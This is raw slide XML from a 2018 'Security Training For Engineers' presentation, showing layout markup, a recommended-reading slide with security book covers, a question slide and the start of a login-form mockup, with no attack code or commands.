            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="13064332"/>
              <a:ext cx="24424614" cy="440695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2609" name="starship-troopers.jpg" descr="starship-troopers.jpg"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="179" t="0" r="0" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17065" y="0"/>
              <a:ext cx="24390691" cy="13235376"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2610" name="band.png" descr="band.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="13445332"/>
              <a:ext cx="24424614" cy="440695"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2612" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261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614" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2615"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med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Recommended Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Recommended Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2620"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62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622" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2623" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2624" name="practical-malware-analysis.jpg" descr="practical-malware-analysis.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="919797" y="3883526"/>
            <a:ext cx="5340257" cy="7060582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="431800" dist="208883" dir="20898214">
              <a:srgbClr val="000000">
                <a:alpha val="48321"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="0" stA="50000" stPos="0" endA="0" endPos="40000" dist="0" dir="5400000" fadeDir="5400000" sx="100000" sy="-100000" kx="0" ky="0" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2625" name="Screen Shot 2018-04-12 at 08.47.53.png" descr="Screen Shot 2018-04-12 at 08.47.53.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6517544" y="3883526"/>
            <a:ext cx="5506709" cy="7060582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="431800" dist="208883" dir="20898214">
              <a:srgbClr val="000000">
                <a:alpha val="48321"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="0" stA="50000" stPos="0" endA="0" endPos="40000" dist="0" dir="5400000" fadeDir="5400000" sx="100000" sy="-100000" kx="0" ky="0" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2626" name="defensive-sec-handbook.jpg" descr="defensive-sec-handbook.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12281742" y="3884295"/>
            <a:ext cx="5462486" cy="7059043"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="431800" dist="208883" dir="20898214">
              <a:srgbClr val="000000">
                <a:alpha val="48321"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="0" stA="50000" stPos="0" endA="0" endPos="40000" dist="0" dir="5400000" fadeDir="5400000" sx="100000" sy="-100000" kx="0" ky="0" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2627" name="hacking-art-of-exploit.jpg" descr="hacking-art-of-exploit.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18001718" y="3883526"/>
            <a:ext cx="5430581" cy="7060582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="431800" dist="208883" dir="20898214">
              <a:srgbClr val="000000">
                <a:alpha val="48321"/>
              </a:srgbClr>
            </a:outerShdw>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fast" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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31"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632" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2633" name="[ REDACTED ]"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7411888" y="5935662"/>
            <a:ext cx="9560224" cy="184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solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>[ REDACTED ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Roberto DEMANDS…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="958453" y="625078"/>
            <a:ext cx="10266703" cy="11724845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Roberto </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="15000">
                <a:solidFill>
                  <a:srgbClr val="C62818"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMANDS</a:t>
            </a:r>
            <a:endParaRPr sz="15000">
              <a:solidFill>
                <a:srgbClr val="38D142"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Your Questions!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2638"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63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640" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2641" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2642" name="pasted-image-small.png" descr="pasted-image-small.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14041928" y="735986"/>
            <a:ext cx="8704738" cy="12244028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2643" name="Ha HAA! Ha HAA!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10547987" y="1159337"/>
            <a:ext cx="2202334" cy="447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000">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Ha HAA! Ha HAA!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2644" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12930858" y="1489805"/>
            <a:ext cx="2330253" cy="840482"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="A6AAA9"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>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6"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47" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Security Training For Engineers"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="748029" y="973284"/>
            <a:ext cx="22718608" cy="226195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p>
            <a:pPr algn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Security Training </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F8991B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For Engineers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-170606" y="11919660"/>
            <a:ext cx="24725212" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="165100">
            <a:solidFill>
              <a:srgbClr val="F8991B"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200"/>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="APRIL 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="825764" y="3153376"/>
            <a:ext cx="22715540" cy="1043782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr cap="all" sz="4400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>APRIL 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Rich Adams"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1987618" y="10423473"/>
            <a:ext cx="5076463" cy="765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lvl="1" algn="l">
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Rich Adams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Security &amp; Incident Response"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2001118" y="10986940"/>
            <a:ext cx="14199848" cy="574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lvl="1" algn="l">
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Security &amp; Incident Response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914764" y="10367537"/>
            <a:ext cx="1176002" cy="1173588"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4822"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="157" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17678400" y="7909342"/>
            <a:ext cx="4076700" cy="4644608"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4076700" cy="4644607"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="154" name="padlock-orange.png" descr="padlock-orange.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5">
              <a:extLst/>
            </a:blip>
            <a:srcRect l="0" t="0" r="0" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="453744" y="0"/>
              <a:ext cx="3367456" cy="4591985"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4092157"/>
              <a:ext cx="4076700" cy="552451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="156" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="664272" y="3819107"/>
              <a:ext cx="2946401" cy="552451"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="353535"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Circle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5389033" y="13055778"/>
            <a:ext cx="212726" cy="212726"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C151"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="public version"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5602652" y="12962776"/>
            <a:ext cx="2631762" cy="422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cap="all" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public version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02" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8885585" y="688271"/>
            <a:ext cx="6612831" cy="5257201"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6612829" cy="5257199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="396" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6612830" cy="5257200"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="6612829" cy="5257199"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="394" name="frame.png" descr="frame.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId3">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="6612830" cy="5257200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="395" name="Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="260436" y="940886"/>
                <a:ext cx="6091958" cy="4095901"/>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solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Login"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2731442" y="907853"/>
              <a:ext cx="1149946" cy="625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200">
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Login</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="398" name="Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="409532" y="2319418"/>
              <a:ext cx="5793767" cy="618364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="E7EBEF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:hueOff val="384618"/>
                      <a:satOff val="3869"/>
                      <a:lumOff val="5802"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="399" name="Username"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
